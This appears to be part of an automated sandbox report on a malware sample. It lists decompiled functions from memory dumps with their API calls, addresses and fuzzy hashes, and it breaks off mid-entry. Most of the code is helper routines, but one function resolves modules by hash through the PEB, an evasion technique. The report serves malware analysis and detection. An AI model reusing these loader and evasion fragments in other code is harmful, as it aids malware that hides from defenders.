Function 004044EE, Relevance: 1.3, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr _v8;
				void* _t25;
				void* _t28;
				long _t29;
				signed int _t36;
				void* _t45;
				signed int _t53;
				signed int _t55;
				signed int _t58;
				void* _t61;
				void* _t63;

				_t36 = 0x400;
				_t53 = 2;
				_t58 = 0x400;
				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
				if(_t61 == 0) {
					L4:
					_t25 = 0;
				} else {
					_v8 = 0x800;
					while(1) {
						E00402B4E(_t61, 0, _t58 + _t58);
						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
						_t13 = _t58 - 1; // 0x3ff
						_t63 = _t63 + 0x24;
						_t66 = _t28 - _t13;
						if(_t28 != _t13) {
							break;
						}
						_v8 = _v8 + 0x800;
						_t36 = _t36 + 0x400;
						E00402BAB(_t61);
						_t55 = 2;
						_t58 = _t36;
						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
						if(_t61 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t29 = GetLastError();
					_t45 = 2;
					__eflags = _t29 - _t45;
					if(_t29 != _t45) {
						_t25 = _t61;
					} else {
						E00402BAB(_t61);
						goto L4;
					}
				}
				L5:
				return _t25;
			}

0x004044f5
0x004044fe
0x00404501
0x00404512
0x00404517
0x0040457c
0x0040457c
0x00404519
0x00404519
0x00404520
0x00404527
0x0040453a
0x0040453f
0x00404542
0x00404545
0x00404547
0x00000000
0x00000000
0x00404549
0x00404550
0x00404557
0x00404562
0x00404565
0x00404574
0x0040457a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040457a
0x00404585
0x0040458d
0x0040458e
0x00404590
0x0040459b
0x00404592
0x00404593
0x00000000
0x00404598
0x00404590
0x0040457e
0x00404584

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: cce251a4ac3815c342be131c1f7913d501d9e9febb49690fde8f9c7daf5cd2a3
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: cce251a4ac3815c342be131c1f7913d501d9e9febb49690fde8f9c7daf5cd2a3
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Uniqueness

Uniqueness Score: -1.00%

Function 052597C5, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 05259816

Memory Dump Source

Source File: 00000004.00000002.2375149204.0000000005259000.00000040.00000001.sdmp, Offset: 05259000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9b7a3c487a64bf58ded91070234323fc03550c484e324da174e97e289223f8d8
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 4B113C79A00208EFDB01DF98C989E98BBF5EF08350F0580A4F9489B361D775EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = CloseHandle(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,00000000,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0022092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 002209DC, 002209DF, 002209E4
l, xrefs: 00220966
., xrefs: 0022095F

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a1368690eb1bf0129f82696e878bee6ebb4af28ed6ea8f51c4a445d236bbdf64
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 9E319DB2910219DFDB10CF88D880AADBBF5FF08724F14404AD401A7312C3B0EA94CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002256EC, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: dfd8f1762b7e61849dd54909cfa01113c173175dffb6dfd8a47e01bd9a90d9a7
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: A64109B0A24B30AFE30C8F5AD495665BFD2EF81341B08C07DE8AACF655C6B0D515EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040549C, Relevance: .1, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040549C(signed int _a4, signed int* _a8) {
				signed int* _t46;
				void* _t47;
				signed int* _t48;
				signed int* _t49;
				signed int* _t50;
				signed int* _t51;
				signed int* _t52;
				signed int* _t53;
				signed int* _t55;
				signed int* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				unsigned int _t64;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed char* _t124;

				_t124 = _a4;
				_t59 =  *_t124 & 0x000000ff;
				if(_t59 >= 0) {
					_t57 = _a8;
					_t57[1] = _t57[1] & 0x00000000;
					 *_t57 = _t59;
					return 1;
				}
				_t95 = _t124[1] & 0x000000ff;
				if(_t95 >= 0) {
					_t55 = _a8;
					_t55[1] = _t55[1] & 0x00000000;
					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
					return 2;
				}
				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
				if(_t61 < 0) {
					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
					_t62 = _t61 & 0x001fc07f;
					if(_t97 < 0) {
						_t98 = _t97 & 0x001fc07f;
						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
						if(_t77 < 0) {
							_t64 = _t62 << 0x00000007 | _t98;
							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
							if(_t100 < 0) {
								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
								if(_t79 < 0) {
									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
									_t81 = (_t79 & 0x001fc07f) << 7;
									if(_t102 < 0) {
										_t46 = _a8;
										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
										_t47 = 9;
									} else {
										_t48 = _a8;
										 *_t48 = _t102 & 0xf01fc07f | _t81;
										_t48[1] = _t64 >> 4;
										_t47 = 8;
									}
								} else {
									_t49 = _a8;
									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
									_t49[1] = _t64 >> 0xb;
									_t47 = 7;
								}
							} else {
								_t50 = _a8;
								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
								 *_t50 = _a4;
								_t50[1] = _t64 >> 0x12;
								_t47 = 6;
							}
						} else {
							_t51 = _a8;
							 *_t51 = _t98 << 0x00000007 | _t77;
							_t51[1] = _t62 >> 0x12;
							_t47 = 5;
						}
					} else {
						_t52 = _a8;
						_t52[1] = _t52[1] & 0x00000000;
						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
						_t47 = 4;
					}
					return _t47;
				} else {
					_t53 = _a8;
					_t53[1] = _t53[1] & 0x00000000;
					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
					return 3;
				}
			}

0x004054a1
0x004054a4
0x004054a9
0x004054ab
0x004054ae
0x004054b2
0x00000000
0x004054b4
0x004054bb
0x004054c1
0x004054c3
0x004054ce
0x004054d2
0x00000000
0x004054d4
0x004054e2
0x004054e6
0x00405513
0x00405515
0x00405519
0x0040553b
0x0040553d
0x00405541
0x00405565
0x0040556a
0x0040556e
0x0040559a
0x0040559e
0x004055c9
0x004055cb
0x004055d0
0x0040560d
0x00405610
0x00405612
0x00405615
0x004055d2
0x004055d2
0x004055e4
0x004055e6
0x004055e9
0x004055e9
0x004055a0
0x004055a0
0x004055b7
0x004055b9
0x004055bc
0x004055bc
0x00405570
0x00405570
0x0040557d
0x00405587
0x00405589
0x0040558c
0x0040558c
0x00405543
0x00405543
0x00405552
0x00405554
0x00405557
0x00405557
0x0040551b
0x0040551b
0x00405525
0x00405529
0x0040552b
0x0040552b
0x00000000
0x004054e8
0x004054e8
0x004054f9
0x004054fd
0x00000000
0x004054ff

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Uniqueness

Uniqueness Score: -1.00%

Function 00222C24, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 562ed277eeafd852baf3ed6db853e4c19c8da738cd60c41f05dc73f441d777a4
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: B521D476A70AA367DB25CD78D8C83B163D0EF99B00F980634CF40C3696D278EA31D680

Uniqueness

Uniqueness Score: -1.00%

Function 004029D4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
				signed int _t26;
				signed int _t27;
				signed int _t28;
				signed int _t39;
				signed int _t47;
				unsigned int _t69;
				unsigned int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				signed int* _t76;

				asm("pushad");
				_t75 = _a36;
				_t69 = _a40;
				_t26 = 0;
				if(_t75 != 0) {
					_t27 = 0xffffffffffffffff;
					if(_t69 != 0) {
						while((_t75 & 0x00000003) != 0) {
							_t47 = _t27 ^  *_t75;
							_t75 = _t75 + 1;
							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
							_t69 = _t69 - 1;
							if(_t69 != 0) {
								continue;
							}
							break;
						}
						_t73 = _t69 & 0x00000007;
						_t70 = _t69 >> 3;
						while(_t70 != 0) {
							_t76 = _t75 + 4;
							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
							_t75 =  &(_t76[1]);
							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
							_t70 = _t70 - 1;
						}
						_t71 = _t73;
						if(_t71 != 0) {
							do {
								_t28 = _t27 ^  *_t75;
								_t75 = _t75 + 1;
								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
								_t71 = _t71 - 1;
							} while (_t71 != 0);
						}
					}
					_t26 =  !_t27;
				}
				_a28 = _t26;
				asm("popad");
				return _t26;
			}

0x004029d4
0x004029d5
0x004029d9
0x004029e2
0x004029e6
0x004029ec
0x004029f1
0x004029f7
0x004029ff
0x00402a01
0x00402a0c
0x00402a0f
0x00402a10
0x00000000
0x00000000
0x00000000
0x00402a10
0x00402a14
0x00402a17
0x00402a1a
0x00402a1e
0x00402a55
0x00402a57
0x00402a8b
0x00402a8e
0x00402a8e
0x00402a91
0x00402a95
0x00402a97
0x00402a97
0x00402a99
0x00402aa4
0x00402aa7
0x00402aa7
0x00402a97
0x00402a95
0x00402aaa
0x00402aaa
0x00402aac
0x00402ab0
0x00402ab1

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Uniqueness

Uniqueness Score: -1.00%

Function 052593E3, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2375149204.0000000005259000.00000040.00000001.sdmp, Offset: 05259000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 1730b5622fb5fa6054dd9990fca73281b50b41e542b37953072a437076ef19df
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: EF117C72360200EFDB44DF55DC85EA673EAEF89230B198065ED09CB312E679EC81C760

Uniqueness

Uniqueness Score: -1.00%

Function 002233CB, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: ed0012539459712541b5f78bc7de34f621e8ea4687590e555406e2c36c8655c3
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: A001A272920214BBD721DFD8E881EAEF7F8EB45760F6141A9F90497201D635AE10DA60

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.2374730922.000000000049F000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Function 00220D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 69e606d9c0802334ac9c6ebbe2e8100b6930642a7caac05eacd4c3881bef1d4d
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 6CF0C877611514AFDB11CFA4D845BAD73F9FB85315F0445A4D806D7242D330E9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0022459D, Relevance: 12.1, APIs: 8, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002245DF
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 002245F9
VariantInit.OLEAUT32(?), ref: 00224614
SysAllocString.OLEAUT32(?), ref: 0022461D
SysAllocString.OLEAUT32(?), ref: 00224669

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: AllocString$CreateInitInitializeInstanceVariant
String ID:
API String ID: 3142612389-0
Opcode ID: 801e2b92af4e068e2500d06ec890c455c2e33c95400fcbe31e3e444cab2ae094
Instruction ID: 7445e3816a8e586f8078341fc9d185d6621e6b0b2cc1dc20365a420270e3cc5f
Opcode Fuzzy Hash: 801e2b92af4e068e2500d06ec890c455c2e33c95400fcbe31e3e444cab2ae094
Instruction Fuzzy Hash: A3415971A1061AEBDB00EFE4EC84AEEBFB9FF49314F104069F904AB150DB719A55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00225067, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,?,?,00000000), ref: 0022509F
socket.WS2_32(?,?,?), ref: 002250CA
FreeAddrInfoW.WS2_32(00000000), ref: 002250E0

Memory Dump Source

Source File: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false

Yara matches

Similarity

API ID: AddrFreeInfogetaddrinfosocket
String ID:
API String ID: 3289331118-0
Opcode ID: 501034e39646eae3bd78317b1afc8d3089a7d6114b3b030c76452554e1e7af80
Instruction ID: 5d3900f1f424b84653d342ccb999bc05f8d895836df028c9fc98c390971fc99b
Opcode Fuzzy Hash: 501034e39646eae3bd78317b1afc8d3089a7d6114b3b030c76452554e1e7af80
Instruction Fuzzy Hash: BA219F7252092AFFCB105FE0EC49ADDBBB5FF08310F208569F545A1160DB318E749B94

Uniqueness

Uniqueness Score: -1.00%

Function 0022690F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000534,?,002268E3,00000000,?), ref: 0022694B
GetLastError.KERNEL32(?,002268E3,00000000,?), ref: 00226958

Strings

h", xrefs: 0022693A
h", xrefs: 0022692C, 0022692F

Memory Dump Source

